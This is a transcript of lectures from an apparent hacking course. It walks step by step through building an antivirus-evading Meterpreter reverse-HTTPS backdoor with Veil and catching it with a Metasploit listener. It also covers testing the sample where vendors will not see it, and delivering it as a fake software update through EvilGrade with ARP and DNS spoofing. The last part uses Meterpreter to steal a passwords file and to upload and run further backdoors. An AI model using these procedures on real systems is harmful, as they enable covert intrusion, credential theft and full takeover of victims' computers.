In this lecture, we're going to learn how to generate an undetectable backdoor. A backdoor is just a file that when executed on the target computer, it'll give us full access to that computer. So it'll basically allow us to hack it and do anything that we want on that computer. There's a number of ways to generate backdoors, and what we're interested in is to generate a backdoor that is not detectable by antivirus programs. Now, this is not very hard to achieve, as you'll see, and we're going to do this using a tool called Vil Framework. Now, first of all, we're going to have to install this framework. There is an installation script in the resources of this lecture that you can use to automatically install it and configure it properly. I already have it downloaded right here in my downloads. As you can see right here, it's called Install Vil. So I'm simply going to open up my terminal and I'm going to navigate to my downloads using the cd command. So cd downloads. And if we do ls, we can see this file right here, the installation script. By the way, feel free to double click it and see the contents of it. It simply has a number of commands to install dependencies, download Vil, and configure it properly. So to run this script, first of all, we have to change its permissions to an executable. And to do that, we're going to use the chmod command. We're going to do +x to add executable permissions. And the file that we need to add executable permissions to is this file right here. It's called install Vil. So we're basically using the chmod command to change permissions. We're adding executable permissions to this specific file. We're going to hit enter and the commands run with no errors. That means the command got executed properly. So if we do ls again to list files, you'll see the file listed in green, meaning it is an executable. And to run an executable in Linux, we always do // followed by the executable name. So I'm just going to type in tab to autocomplete. And we have the name right here. So we're simply running this file as an executable by adding // to it. And I'm going to hit enter to run it. I'm going to maximize this. And you want to give this its time. You want to make sure that you have internet access because, as I said, it's going to download Vil and install it. And Vil is a huge framework. That's why I actually didn't include it in the custom image because it's really, really big. So you want to give it its time. Make sure you have stable internet connection so it's able to download and install everything. And if you face any issues, just take a screenshot of the error, post it in the Q&A or in the forums, and we will be happy to help you. Now I'm going to pause this video and we'll resume once the installation is complete. Now you might get this message during the installation asking you if it should automatically restart services during the upgrade and during the install. We're going to navigate with the left arrow, hover over the yes and hit the enter key on the keyboard to say yes and continue the installation. Now during the installation, you might actually get messages on the terminal telling you to go through a prompt and click next. Ignore them. You don't need to do anything. The script will do everything for you. So you literally need to just wait for it to do everything, and that's about it. Perfect. Now the installation is complete. I'm just going to clear the screen. And if we just type the tool name, VEIL, hit enter, you'll see that the program will run with no issues at all. Now, in the next lectures, I'm going to show you how to use this program to generate undetectable backdoors that can be used to hack Windows computers. Okay, now that we have Vil loaded, you can see it show us the main commands that you can use with Vil. So the first command is you can do exit to exit. You can do info to get information about a specific tool. You can do list to list the available tools. You can do update to update Vil. And this is very, very important because you always want to be up to date when it comes to bypassing antivirus programs. And then you can do use to use a tool. Now, let's start using Vil evasion, and as we do it, it's going to become so easy and you'll be able to understand it more. Now, Vil has two main tools, and if we do list, you'll be able to see them. So, we have the first one, which is the one that we're interested in, which is called evasion, and that's the one that generates undetectable backdoors for us. And then there's the second one, which is called Ordnance. And this tool generates the payloads that's used by Evasion. So you can look at this as a helper or a secondary tool. Now, what I mean by a payload is the part of the code of the backdoor that does the stuff that we want, that does the evil stuff, if you want to say. So it's the part of the code that gives us a reverse connection. It's the part of the code that download and execute something on the target computer. It's the part of the code that allow us to achieve what we want by executing that file. And this is going to become more clear as we start using Vil. Now, for now, we're interested into using Evasion. So we're going to do use 1 because that's the first tool. That's number 1. And as you can see, we have Vil Evasion loaded now. And as I said before, this used to be a standalone tool that you just downloaded on its own. But now they have it all combined together. Now, as you can see, the first thing that we get when we load Vil Evasion is the commands that you can run on this tool. So the first thing that we want to do is we want to list to see all the available payloads. And as you can see, we have 41 different payloads. And all of these payloads follow a certain naming pattern. And you can see, for example, let's take this example right here because that's the payload that I'm going to be using. You can see the payload is divided into 3 parts. The first part right here refers to the programming language that the payload is going to be wrapped in. So we have the evil code, and then the evil code is going to be wrapped into a certain programming language that the target computer understands. And right here you can see that this payload uses Go programming language. We can see this one uses C. We can see these ones use CS. We have Python, we have PowerShell, and we have Ruby if we scroll down. The second part of the payload is really important. This is the type of the payload, the type of the code that's going to be executed on the target computer. In this example, we're using Meterpreter, which is a payload designed by Metasploit. Metasploit is a huge framework for hacking and it allows you to do a lot of things. But in this lecture, we're focusing on creating a payload called Meterpreter. And what's really cool about Meterpreter is it runs in the memory and it allows us to migrate between system processes. So we can have the payload or the backdoor running from a normal process like Explorer, for example, and this payload will allow us to gain full control over the target computer. So we'll be able to navigate through the file system, download, upload files, turn on the mic, turn on the webcam, even use that computer to hack other computers, install a keylogger. You can literally do anything you can think of. And all of this will be running from the memory from a normal process on the system. So it's very hard to detect and it doesn't leave a lot of footprints. That's why it's a really, really cool payload and we'll be using it a lot. The third part of the name is the method that's going to be used to establish the connection. So in here you can see that this is called rev HTTPS. So rev stands for reverse and HTTPS is the protocol that's going to be used to establish the connection. So we can see that this payload will create a reverse HTTPS connection. You can see this one right here, for example, it creates a reverse HTTP connection. And we have this one in here that creates a reverse TCP connection. Now, what I mean by reverse is the connection is going to come from the target computer to my own computer. So I won't be connecting to the computer that I want to hack. What's going to happen is once the person double clicks the backdoor will connect back to me from the target computer. What's cool about this is I'll be able to bypass antivirus programs because the connection is not going to the target computer, it's coming back to my computer. So it's literally as if the target person is just connecting to a normal website. I'm going to use a port that websites use, which is 80 or 8080. So again, if the person analyzes the connection, it'll look as if they're literally just connecting to a normal website. Also, if the target computer is hidden behind a router or behind a network, again, this is going to work because the connection is coming from the target computer to me instead of me connecting to the target computer. So using a reverse connection is really handy, and I think this is really the only practical way of gaining access to a computer, because there is a lot of things that can stop you from connecting to a certain computer. Now this is the general naming pattern. You'll see some payloads like this one right here, which doesn't follow that general naming pattern. And basically what these payloads do, for example, you can see this one is called shellcode inject. So what it's going to do is it's going to create a payload that injects your other payload. So it's going to create a normal payload, and that normal payload injects a Meterpreter payload, for example. Now it does this to try to bypass more security, but usually they won't bypass more things than the normal payloads would bypass. So that's why I usually just use one of the normal payloads in here. So this is it. This is all about the payloads. Sorry I took a bit of time, but I wanted to make sure that you guys understand the naming pattern. I wanted you to understand what a payload is and the difference between a reverse and a bind and a TCP payload. This way, the rest of the course will become more clear to you, and I can just use the payload that I want without explaining what it is. Now, in the next lecture, we're going to be generating a payload, and we'll be testing it against antivirus programs. Okay, so in this video, we're going to be using Vil to create a backdoor. So the first thing I'm going to do is I'm going to do list to list the available tools, and I'm going to use number 1. Because we want to use evasion. And then I'm going to list my payloads. And like I said in the previous lecture, I want to use Go Meterpreter reverse HTTPS. So that's number 15. So I'm going to do use 15. And that's going to list first of all, it's going to show me information about this particular payload. And then it'll show me the options that I can set for this payload. So the main option that you want to set, and the most important one, is the IP address. So this is the IP address which you're going to be receiving the connections on. As we said, we're going to have a reverse connection, and we need to set the IP address which the payload or the backdoor will try to connect back to. And in our case, we want to receive the connection back to this Kali machine. So we're going to set the IP lhost to the IP address of the current Kali machine. Now to get the IP of my Kali machine, I have to run ifconfig. So I'm going to split the screen by doing right click and click on split horizontally. And I'm just going to bring this down a bit. And we're going to run ifconfig. Now you can see the IP address in here is 10.20.14.213. This is the IP of my Kali machine. This is the IP of the machine that I'm using as the attacking machine. So this is where I want the connection to come back to, so I can hack the target computer once the backdoor is executed. So I'm going to set lhost to 10.20.14.213. So you can set any of these options using the set command. So all you have to do is write set followed by the option that you want to change. So in this case, we want to change the lhost, and we want to change that to 10.20.14.213. Now, the L port is set to 80, which is really good because that's the port that's used by web servers. So as I said, the connection will look as if the target person is connecting to a website, and it's not going to be suspicious. But I don't want to use that port because I'll have a web server running on this, and we'll talk about that later. So I'm going to change that to 8080. 8080 is another port that's used by web servers, so it's still not suspicious, and it should still bypass firewalls. So I'm just going to do set. Same way that we did it before with the lhost, we're going to do lport to the value that we want to set this option to, and we're going to set it to 8080. Now if I do options again, to list all the options, you'll see that the lhost changed to 10.20.14.213 and the lport changed to 8080. Now if you generate the backdoor like this, you will bypass all antivirus programs except AVG. I've already tried this, that's how I know this, and that's not good enough because we want to bypass everything. Now, the way antivirus programs work is they have a very large database of signatures. These signatures correspond to files that contain harmful code. So what they do is they compare the signature of your file, of your backdoor, to all the files in this huge database. If your file matches any of these files, then they'll flag it as a virus or as malware. If it doesn't, then they'll think that it's a normal file and it's not malware. So the main point in here is we're gonna try to modify the file, our backdoor, as much as possible to make it more unique so that it bypasses the signature database and will be able to bypass antivirus programs. Now, as I said, Vil is already doing that for us. It's encrypting the backdoor, it's obfuscating it, it's injecting it in the memory so that it doesn't get detected, and it's doing a good job at it. It's bypassing pretty much everything except for only one antivirus program. So just to bypass this last antivirus program, I'm gonna set some optional options that really won't do much of a difference. They'll just make the backdoor look a bit different. So the first thing that I'm gonna modify is processors. And that's the minimum number of processors to be used by the backdoor. I'm not gonna set a huge number because that'll just make my backdoor not work. I'm just gonna set it to 1, which is pretty much nothing really, but I'm just gonna set this option to make the code look a bit different. So I'm gonna do set. Again, the same way that we are setting the L port and the L host, we're just gonna put the option name, which is processors. And we're gonna set that to number 1. And I'm also going to set another option, which is the sleep option. And that basically lets the backdoor sleep for a number of seconds that you set before it executes the evil code that you have in there, before it executes the payload. So I'm going to set this to 6. Again, no real reason for this. I'm only doing this to make the backdoor look a bit different. So I'm going to do set sleep to 6. So I'm going to hit enter. And I'm going to do options again to make sure that all the options are set the way I want them to be. So I have my IP address set properly, I have my L port, I have my processors, and I have my sleep. So I'm going to generate the backdoor. And now it's asking me to name this backdoor something. So I'm going to name this backdoor rev https 8080. Just so that we can remember which payload and which port to use for this backdoor in the future. Now the backdoor is generated, and you can see it's telling us the module that's used, and it's telling us where the backdoor is stored. So the backdoor is stored in this path right here. So I'm gonna copy that. Let's go ahead and check to see if the backdoor is detected by any antivirus programs. Now you can use the built-in feature by Vil using the check VT command, but this feature only uses the signature of the file and it's not 100% accurate. Sometimes it tells you that the file will bypass all antiviruses, but it'll actually be detected. You can also use VirusTotal, but I don't recommend that, and please don't do that, because if you do that, your backdoor will become less effective, because VirusTotal share the results of their scans with antivirus programs. What we're going to do is we're going to use a website called NoDistribute. So we're going to go to it now. So I'm just going to Google for NoDistribute. And what this is going to do, it's similar to VirusTotal. The only difference is it's not going to share the scan results with antivirus programs, so it won't affect your backdoor. So I'm going to click on Browse to navigate to my file. And I'm just going to copy where the file is stored. So Vil is telling me now it's stored in this location in user share Vil output compiled. So I'm going to copy this. And I'm going to come here. I'm going to click on the pen. And I'm going to paste the location. I'm going to click on Open. And scan the file. I'm going to include a link to this website in the resources of this lecture, along with an alternative in case it didn't work for you. And as you can see, the file is bypassing all antivirus programs. So we can use this backdoor against any device, and we'll be sure that the device or the computer will not be able to detect this file as a virus. Now please keep in mind that you won't always get perfect results like this. Antivirus programs always update their database, and Vil also always updates the way they generate backdoors. So it's pretty much like a full cycle. Vil is always trying to bypass antiviruses, and antiviruses are always trying to detect the latest backdoors. So first of all, you want to make sure that you're using the latest version of Vil, and you'll have to experiment with the different payloads and different options until you get it to work. This is the most basic method of generating undetectable backdoors. I actually cover more advanced methods in my social engineering course and in my Python course, where I actually show you how to write your own backdoor, which is the best method. But these methods are more complex, and this course is designed to be a general course that will introduce you to most hacking fields without diving deep in any. So if you want to learn more advanced methods of bypassing antivirus programs, then check out these courses in the bonus lecture, the last lecture of the course. But anyway, you don't need to worry about this for now. If you can't get it to bypass a lot of antiviruses, you can simply turn off Windows Defender or the antivirus in the target Windows machine for now for testing, just to get an idea on how to generate backdoors and how to interact with them. And then, if you want to learn more, you can check out these other courses, because these other courses will build on what you're going to learn here. So you'll have to learn these skills in here anyway. Also, check out the YouTube video in the resources of this lecture to get a taste on what these methods look like and how effective they are. Now, the backdoor that we created uses a reverse payload. So, like I said before, it does not open a port in the target computer. It actually connects from the target computer to our computer. And by doing that, it'll bypass firewalls and it'll look less suspicious. So for this to work, we need to open a port in our computer so that the backdoor can connect from the target computer to us on that port. So if you remember, when I created the backdoor, I set the port to 8080. So I need to open that port in my Kali machine so that when the target person executes the backdoor can connect back to me on port 8080. So I'm just going to write the name of the payload that we used, because that's very important when you're listening for incoming connections. So we used a payload that's written in Go, and that was a Meterpreter Rev HTTPS, which is a reverse HTTPS payload. Now this is not a command, I'm just going to write it in here, so just that you keep this in mind. And we used port 8080 for the reverse connection. So these are the most important things to keep in mind when listening for incoming connections. So I'm going to split the screen, and I'm going to listen for incoming connections in here. And to do that, I'm going to use the Metasploit framework. Now to run Metasploit, all you have to do is just run MSF console. Now Metasploit framework is a huge framework for penetration testing. So the Meterpreter backdoor, or the Meterpreter payload that Vil created for us, is actually programmed by the people who made Metasploit. That's why we're using Metasploit to listen for incoming connections. So Vil Evasion actually uses Metasploit to generate the backdoor that we chose in the previous video. So to listen for incoming connections, we're going to use a module in Metasploit. Now Metasploit, as I said, is a huge framework and it has a lot of modules. So the module that we're interested in is a module that allows us to listen for incoming connections from a Meterpreter payload. To use that module, we're going to do use to use a module, and then we're going to specify the module name. And the module name is exploit multi-handler. Okay, so the command we're using is use to specify the module that we want to use, and we're using a module called exploit multi-handler that allows us to listen for incoming connections. I'm going to hit enter. And I was already in that module, so you can see that nothing changed for me, but for you, you should navigate to that module. And I'm gonna do show options to see the options that I can set for this module. And you can see that you can specify different options for it. The most important thing that you want to specify is the payload. So you can see in here for me, it's set to Windows Meterpreter Reverse TCP. And if you remember what we used a Meterpreter Reverse HTTPS, not TCP. So you want to change this. The first part is fine because our target is going to be Windows, but you want to change the reverse TCP to reverse HTTPS. And you can change that exactly the same way that we did with vil evasion. So you type in set, you put the option name that you want to change, and we want to change the option for the payload. So we're going to say payload. And we're going to set that to Windows Meterpreter Reverse HTTPS this time. Okay, so we're doing set to set an option. We're setting the payload to Windows Meterpreter Reverse HTTPS. Now this payload should correspond to the payload that you chose in the backdoor. So in the backdoor we used Meterpreter Reverse HTTPS. That's why in here we're using Reverse HTTPS as well. If you chose Reverse HTTP, then set this to Reverse HTTP. If you use Reverse TCP, then set this to Reverse TCP, and so on. So I'm gonna hit enter for this, and that's gonna do it for me. And if I do show options now, you'll see the payload changed to Windows Meterpreter Reverse HTTPS. Now the same concept applies for all the other options. So you want to set the lhost to our IP address, and you can see that this is already set to the right one. So if it was wrong for you, all you have to do is just do set lhost and put your IP address. So you can get the IP address using ifconfig like I showed you in the previous lecture. So for me it's 10.20.14.2.13, and again this is the same IP that I used when I created my backdoor. And same goes for the port. You want to set the same port. So we're going to do set lport to 8080 because that's the port that we used when we generated the backdoor. So again, the main idea with this is you want to set the payload, the lhost, and the port to exactly the same options that you chose when you created the backdoor. Once done with that, we're going to do show options one more time. And you'll see that I have my payload set properly, Windows Meterpreter Reverse HTTPS. I have my lhost, and I have my lport. And all of that is done properly. So all we have to do now is just do exploit. And now Metasploit is waiting for connections, as you can see, on port 8080 and on my IP address, which is 10.20.14.2.13. So now if anybody opens the backdoor that we created in the previous lecture, because it's a reverse backdoor, the backdoor will try to connect to the IP that we set when we created the backdoor, which was 10.20.14.2.13, and it'll try to connect on port 8080. It's going to come to this computer, and this computer is already waiting for that connection from this multi-handler module. So the connection will be established, and then I'll be able to control the target computer, and I'll basically hack it and have full control over it. Now in the next lecture, I'll show you a very basic way to deliver the backdoor to the target computer and how to test the backdoor and make sure that it works properly. Now we're ready to receive connections from our backdoor. So we created the backdoor, we set a payload, and we're listening for incoming connections here from any connection that comes in from the same backdoor on the same port on the same IP. So now if a person runs that backdoor, we'll receive the connection back in here on this computer. What we're gonna do now is we're gonna test the backdoor to make sure that it works. And to do that, we're gonna use a very basic delivery method. Later on in the course, we're going to talk about smart delivery methods that will trick the person into opening the file that we're sending to them. For now, we're just doing a very basic example just to test our very basic backdoor. So to do that, we're just going to put the backdoor on our web server and then download it from the target computer. So there's nothing smart about this, and you probably can't use this way to deliver the backdoor to a real person. So we're only doing this for testing to make sure our backdoor works. So Kali comes in with a web server, and what that means basically, you can use Kali as a website. So what we're going to do is we're going to put that backdoor in that website and then just download it from the target Windows machine. Now the website directory where you should store the website files is var www.html. So I'll show you where it is now. If you just click in here on the path and then put a /, it will allow you to manually type the path that you want to go to. So we want to go to var www.html. And this is the location where the website files are stored. Now for you, you'll probably only have index.html. You won't have all of that stuff, but that's just stuff that I created while I was testing a few things. So the index is the main page that people usually see when they browse to this website. So what I'm going to do here is I'm going to first of all create a directory, and I'm going to call it evil files. So every time we create a backdoor or a keylogger, we're going to put it in here and then download it in the Windows machine to test it. And again, later on in the delivery methods section, we're going to talk about smart delivery methods. For now, we're only going to be creating the evil files and test them to make sure that they work as expected. So I'm going to call this directory evil files. And inside it, I'm going to put the backdoor that we created before. So the backdoor that we created was made using Villavision, and Villavision actually gave us the full path of it when we created it, if you remember, or you can go back now to the lecture and have a look on it. So I'm just going to press Ctrl-T to open a new tab, and then again I'm going to click on the path in here, and I'm going to put / to manually enter the path, and then we're going to go to var lib Villavision output compiled, hit enter, and you'll see the backdoor that I created right here, and we named it rev https 8080. So I'm going to copy this and paste it in here. And that's it. Now we can download this file from the website that Kali uses, that Kali has. Now to start the web server, to start the website, we have to start its service from the command prompt. And to do that, we're going to do service Apache2 start. So the command is service to start the service. Apache2 is the name of the web server. And then we want to start this web server. I'm going to hit enter, and because we didn't get any errors, that means the command got executed properly. Now everything is done. So the IP of the Kali machine was 10.20.14.2.13. It's the same IP that we're listening here, and it's the same IP that you'd get if you run ifconfig. So I'm going to go to my Windows machine, and I'm going to navigate to my IP address of the Kali machine, which is 10.20.14.2.13. And this will open the basic index.html that I showed you. And it basically just says it works, telling us that the web server is working and the website is working. This is all inside var www.html. So if I wanted to go to the directory where we put the backdoor, then we're just going to go to evil files because we called it evil files. I'm going to hit enter, and you can see the backdoor that we created in the previous lecture, and we called it rev https 8080. So if I click on that, it's going to download it for me. And like I said before, this is not the smartest way to deliver the backdoor, but right now all we want to do is just to test the backdoor and make sure that it works. So if I click on the downloads and run the backdoor, it's going to tell me that this is an executable, so be careful when you run it. But this is not detecting a virus. It's literally just saying be careful when you run exes. I'm going to run it anyway. And once we come back here, you'll see that we received a connection from the target machine. So we didn't connect to the target computer. The target computer connected back to us. So you can see the IP of the target computer, which is 10.20.14.206, and that IP connected back to us on port 8080 right here. So basically now we have full control over that computer. Right here you can see that we have a Meterpreter session, and what Meterpreter allows us to do is literally do anything that the user can do on their computer. So we'll see how we can use the Meterpreter later on in the post-connection attacks. For now, we can see that the backdoor is working, and if we do sysinfo, you can see that we are inside the MS Edge Windows 10 machine. It's Windows 10 right here, it's x64, it uses English US, and it uses a Meterpreter x86 for Windows. So as I said, now we can do anything we want on the target machine, and we'll talk about how to use the Meterpreter later on in the post-connection section. But again, basically right now we hacked the target computer and we have full control over it. Previously, we learned how to create an undetectable backdoor, which is great. But we delivered this backdoor by simply downloading it at the target computer. Now, this will probably not work in real life. Your target will never just download an executable and run it if you ask them to do that. Therefore, in this lecture, I want to show you a smarter delivery method where we will spoof an update. So when a specific program at the target computer checks for updates, it will say that there is an update, and when they install that update, they will actually be installing a backdoor. The only limitation to this method is you need to be the man in the middle. It doesn't matter how, but you need to be able to intercept the connections. So you can do this using ARP spoofing, or using a fake access point, as I showed you before, or using any other method that will allow you to intercept the connections. So usually, programs have a specific domain that they use to check for updates. So let's say we have the user here that has a specific program, it wants to update something, it will send a request to a specific domain. And let's say this domain, in this case, it's updateserver.com. This will be sent to the DNS server. The DNS server will respond with the IP of the update server, which we have right here. And then the user will send a direct request to the update server looking for updates. If there are updates, then the update server will respond with the updates. Now, if we are the man in the middle, if we're able to intercept all the requests and the responses, then when we get a request for updateserver.com, instead of giving the IP of the update server, we can actually give the IP of a hacker server. This server is running a special program called EvilGrade, and EvilGrade will tell the user that yes, there is an update, and instead of serving them an actual update, it'll serve them a backdoor. So when the user agrees to install this update, they'll actually be installing a backdoor on their system. Let's do this practically and it'll become even clearer. Right here, I have my Kali machine. This is the custom image that I made for this course. Therefore, it has EvilGrade pre-installed in it. So first, we'll need to navigate to the location where it's installed. We're going to use the cd command to do that. And it is installed in OPT EvilGrade. And then to run the binary, the program itself, we're going to do ./EvilGrade. Now, using EvilGrade is very simple and very similar to Metasploit. So, to get a list of all the programs that we can hijack their updates, we're going to do show modules. And as you can see, you have a lot of famous programs such as WinZip, VMware, Skype, Safari, and so on. Now we're going to be doing this on a program called DAP, Download Accelerator Plus. So we have it here. So to configure a specific module, all we have to do is just type configure module name, which is DAP. So you can replace DAP with any module that you want to configure, with any program that you want to hijack. So I'm going to hit enter, and as you can see, it's saying that now I'm inside the DAP module, and I'm going to do show options to see all of the options that I can set. So as you can see, we get a list of all the options that we can set, and the main option that we want to change is the agent. This is the path to the program that will be installed as an update. So in our case, we're going to be replacing this with the backdoor that we created in the previous lecture. So to change this option, we're going to do set agent, the option name, to the location where I have my backdoor. And my backdoor is in var www html backdoor.exe. So as you can see, the format of changing options is very similar to Bettercap and Metasploit. We do set, followed by the option that we want to change, followed by the value. So I'm going to hit enter, and that's done. The next thing that I want to modify is the end site, which is the website that will be loaded once the update is successful. Now I know this will return a not found error, that's why I'm going to change it. You don't have to change it with every module. So again, to change this, we're just going to do set end site, and I'm just going to set it to just the basic domain, which is speedbit.com. And finally, before we run everything, I'm going to do show options one last time to make sure that everything is set as I want it. So I have the agent set to var www html backdoor.exe. That's perfect. And I have the end site set to the way I want it. So I'm ready to go. And all we need to do now is just type start to start EvilGrade. So right now, if EvilGrade gets a request for an update, it will say, yes, there is an update, and it will serve the backdoor.exe as the update. The only problem is, it will never get any requests right now, because I am not intercepting connections. I'm still not the man in the middle. Therefore, we're gonna become the man in the middle using Bettercap. Like I said, you can use any method you want to become the man in the middle, but we're just gonna do it using ARP spoofing right now. So I'm going to use Bettercap using the exact same command that we've been using before. So we're just doing Bettercap, giving it the interface connected to the network, and giving it the spoof caplet so that it runs an ARP spoofing attack, putting me in the middle of the connections. I'm going to hit enter, and this will run with no errors, so that's perfect. We also need to use Bettercap to run a DNS spoofing attack and spoof any request to update.speedbit.com. This is the domain that the target program uses to check for updates, and we want to spoof DNS requests to this so they return the IP of the Kali machine right here, which is running EvilGrade, so EvilGrade gives them the fake update. Now, I covered how to do DNS spoofing in details in a full lecture before, so if you don't remember how this works, please go back and revise this lecture because I'm going to do it a little bit quickly right now. So, I'm going to copy this domain, and I'm going to clear the screen here, and we're going to set the DNS spoof all to true, and we'll also set the DNS spoof .domains to the domain that we want to spoof. Finally, we're going to start the DNS spoofer by doing DNS spoof on, and perfect. Now it's working, and it's telling us that it's going to spoof any request to update.speedbit.com to the IP of my Kali machine. The IP of my Kali machine is running EvilGrade. EvilGrade will say, yes, there is a new update, and it'll serve them the backdoor that we have right here. And that way, the backdoor will be automatically executed on the target computer. The only problem is the backdoor will get executed, but we're not listening for incoming connections here, so we won't really get access. Therefore, we need to listen for incoming connections using Metasploit as I showed you before. Now I've already configured my multi-handler. Again, I covered this in details, so if you don't remember how to do it, please go back to that lecture. Right now I'm just going to do show options to show you the options that I set right here. And you can see that I am using a Windows Meterpreter reverse HTTP here because I'm actually using a different backdoor in my EvilGrade, this backdoor right here. It's not a reverse HTTPS as shown in previous lectures. It's actually a reverse HTTP backdoor because for some reason I noticed the HTTPS backdoors are not working with EvilGrade. That's why I created a reverse HTTP backdoor specifically for this lecture. So I'm setting my payload to the same payload that's used in my backdoor. I'm setting my IP in here. I'm setting the L port to 8080. So everything is perfect. I'm going to run exploit to listen for incoming connections. And now we're ready to go. So now let's go over this one more time. When we go to the target computer and check for updates, right now this computer is intercepting connections because of Bettercap, and it's also going to spoof any request for update.speedbit.com to this IP. This is the IP where EvilGrade is working. EvilGrade is going to say, yes, there is a new update. The update is this executable. The target computer will take this executable, it'll run it because it thinks it's an update. When this gets executed, it'll send a connection to us in here in our multi-handler. So let's go to the target computer and see if this will actually work as we expected. So I've already downloaded Download Accelerator Plus, the program that we're trying to hijack its updates, and installed it. So I'm just going to double click it to start the program. Now it's just asking me to set it as the default download manager. I'm going to say no. And I'm going to go to help. And I'm going to click on update now. We're going to say yes, check for updates please. I'm just going to uncheck this, click on next. It's checking for updates now. And it's telling us that there is a new update. So we're going to say next. And it's telling us right here, it's a critical update. So I'll be like, yeah, I want to install this. This will download the update for me and install it. And it's telling us that it's done. Everything is done. We're going to say next. Thank you very much. And finish. Now, if we go back to the Kali machine, you can see we got a reverse connection here from the target. And just to confirm this, we can do sysinfo to see more information. And perfect, as you can see, we're inside the target computer. And now we have full access to that computer and can do whatever the normal user can do on their system. Now, I will talk more about post-exploitation and how to control the computer using this Meterpreter access in the post-exploitation section. But right now, we managed to hack into a computer using a fake update. In today's lecture, we're going to learn some basics about how to interact with Metasploit's Meterpreter. So I already have a session here, and as you can see, it just says Meterpreter. In Linux and everything, in every command line, the help command is always the best command you can run. So the first thing we're going to do, we're going to do a help. And as you can see, you get a big list of all the commands that you can run and a description of what each of these commands do. So I'm going to show you some basics right now. And the first thing that I'm going to do is get my current working directory using the pwd command. And as you can see, I'm in C users at the moment. Now, if I want to list all the files and directories, I'm going to use ls. And let's say that I want to navigate to this file, ie user. I'm going to do cd ie user. And if I do pwd now, you'll see that I'm in users ie user. And let's go into downloads, list the files. As you can see now in the files that we listed, we can see a file here called passwords.txt. So this seems like an interesting file. So let's see if we want to read this file. If I wanted to read it, all I have to do is do cat and passwords.txt. And as you can see, we can see that it contains test1 and test2. So if I go here and run the file, you can see that this is the actual content of the file. Now let's say that I really want this file and I want to keep it for later, then I can download that file. To do that, we're just going to say download, and we put the file name, which is passwords.txt. Now the file has been downloaded successfully, and if I go to my root folder, you'll see that I have a file called passwords and it contains test1 and test2. Let's say that I have a backdoor or a virus or a Trojan or a keylogger that I want to upload on the target computer. So I can upload it very easily. Now I'll go back to my root actually to show you that I have a file called backdoorcalc.exe. So we're going to try to upload that file. And to do that, we're just going to run upload. And we put the file name. Hit enter. And as you can see now, the file has been uploaded successfully. Now let's list to make sure that the file exists. And we can see that we have a new file called backdoorcalc.exe. And to execute this file on the target computer, now we only uploaded it. So if it was a virus or a keylogger and you want to execute it, all you have to do is execute and specify the file that you'd like to execute after the F command, and then type in the name of the file. So in this case, it's backdoorcalc.exe. And as you can see, it's telling us that process 3128 has been created, so my backdoor has been executed. Now, if this was a virus or anything that you uploaded, it'll do what it's supposed to do because you just executed that file. Another feature that I want to show you is shell, which basically just converts the current Metasploit or Meterpreter session into an operating system shell. So if I just type in shell, you'll see I'll get a Windows prompt or Windows command line where I can execute Windows commands. Now, as you can see now, it's on a different channel, and I can run any Windows command that I want through this now. So I can just do dir to list all directories. I can do ipconfig, or use any Windows command that I want, exactly like running the commands through the command prompt. Now, there's much more commands that you can do for file system management. So if you type in help and you go to the file system section, you'll see that you can edit, you can download, we showed that, you can move a file to another file. It also can be used to rename files. You can delete files, you can remove directories, you can search. So there is so many more things that you can do with file system. That was just an overview of the basic or main commands that you can use with managing the file system of the target computer.